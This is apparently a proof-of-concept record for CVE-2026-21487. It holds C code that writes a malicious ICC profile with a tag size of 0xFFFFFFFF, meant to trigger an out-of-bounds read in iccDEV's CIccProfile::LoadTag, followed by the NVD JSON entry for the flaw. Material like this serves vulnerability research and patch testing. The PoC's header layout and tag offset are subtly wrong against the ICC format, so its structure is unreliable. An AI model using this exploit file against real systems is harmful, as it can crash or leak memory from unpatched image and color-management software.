CVE-2026-21487

// PoC for CVE-2026-21487: iccDEV CIccProfile::LoadTag Out-of-bounds Read // This PoC creates a malicious ICC profile file that triggers the vulnerability #include <stdio.h> #include <stdlib.h> #include <string.h> // ICC Profile Header (128 bytes) unsigned char icc_header[128] = { 0x00, 0x00, 0x0C, 0x74, // profile size (will be updated) 'a', 'c', 's', 'p', // profile signature 0x00, 0x00, // preferred CMM type 0x04, 0x00, 0x00, 0x00, // profile version 0x00, 0x00, 0x00, 0x00, // profile/device class 0x00, 0x00, // color space 0x00, 0x00, // PCS 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // creation date 'm', 'n', 't', 'r', // profile file signature 0x00, 0x00, 0x00, 0x00, // primary platform 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // flags 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device manufacturer 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device model 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // device attributes 0x00, 0x00, // rendering intent 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // PCS illuminant 'e', 'n', 'U', 'S', // creator 0x00, 0x00, 0x00, 0x00, // profile ID 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // reserved 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; // Tag table entry with malicious size (triggers OOB read) // signature, offset, size - size is set to a large value to trigger overflow unsigned char tag_table[] = { 0x64, 0x65, 0x73, 0x63, // 'desc' tag signature 0x00, 0x00, 0x00, 0x84, // offset to tag data 0xFF, 0xFF, 0xFF, 0xFF // MALICIOUS SIZE - causes OOB read }; // Malicious tag data unsigned char malicious_tag[] = { 0x00, 0x00, 0x00, 0x00 // minimal tag data }; void create_malicious_icc(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("Failed to create file\n"); return; } // Write header fwrite(icc_header, 1, 128, fp); // Write tag count (big-endian: 1 tag) unsigned char tag_count[4] = {0x00, 0x00, 0x00, 0x01}; fwrite(tag_count, 1, 4, fp); // Write malicious tag table entry fwrite(tag_table, 1, 12, fp); // Write malicious tag data fwrite(malicious_tag, 1, sizeof(malicious_tag), fp); fclose(fp); printf("Malicious ICC profile created: %s\n", filename); } int main() { create_malicious_icc("CVE-2026-21487-malicious.icc"); printf("PoC for CVE-2026-21487 generated.\n"); printf("The malicious ICC file has a tag with size=0xFFFFFFFF which triggers\n"); printf("an out-of-bounds read in CIccProfile::LoadTag function.\n"); return 0; }

{"cve": {"id": "CVE-2026-21487", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:54.103", "lastModified": "2026-01-12T20:57:20.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have an Out-of-bounds Read, Use of Out-of-range Pointer Offset and have Improper Input Validation in its CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Las versiones 2.3.1.1 e inferiores presentan una lectura fuera de límites, uso de desplazamiento de puntero fuera de rango y validación de entrada inadecuada en su función CIccProfile::LoadTag. Este problema está corregido en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-823"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/1516e2cafc253bb06fd3700d589a4ed0f09f7bd6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/340", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xq7x-9524-f7cp", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}